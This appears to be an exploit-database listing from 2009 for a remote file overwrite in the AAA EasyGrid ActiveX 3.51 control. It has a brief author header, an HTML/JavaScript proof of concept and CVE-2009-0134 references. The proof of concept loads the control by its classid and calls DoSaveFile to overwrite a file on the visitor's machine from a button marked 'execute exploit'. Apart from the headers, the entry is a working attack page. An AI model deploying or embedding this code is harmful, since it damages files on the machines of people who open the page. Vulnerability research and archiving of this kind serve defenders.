Lucene search
HoussamixEDB-ID:7779HistoryJan 14, 2009 - 12:00 a.m.
AAA EasyGrid ActiveX 3.51 - Remote File Overwrite
2009-01-1400:00:00
Houssamix
www.exploit-db.com
43
AI Score
7.4
Confidence
Low
=======================================================================================<br>
Author: Houssamix <br>
=======================================================================================<br>
- Viva Gazza - Viva Palestine - <br>
AAA EasyGrid ActiveX v 3.51 Remote File Overwrite exploit <br>
Download : http://www.share2.com/easygrid/download.htm <br>
Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br>
Note : DoSaveHtmlFile() is vuln to , it well overwitten the file with some html code <br>
=======================================================================================<br>
<HTML>
<BODY>
<object id=hsmx classid="clsid:{DD44C0EA-B2CF-31D1-8DD3-444553540000}"></object>
<SCRIPT>
function hehe()
{
File = "c:\\hsmx.txt"
hsmx.DoSaveFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================
# milw0rm.com [2009-01-14]Related
cve
cve
CVE-2009-0134
2009-01-16 18:30:00
prion
prion
Design/Logic Flaw
2009-01-16 18:30:00
nvd
nvd
CVE-2009-0134
2009-01-16 18:30:00
cvelist
cvelist
CVE-2009-0134
2009-01-16 18:00:00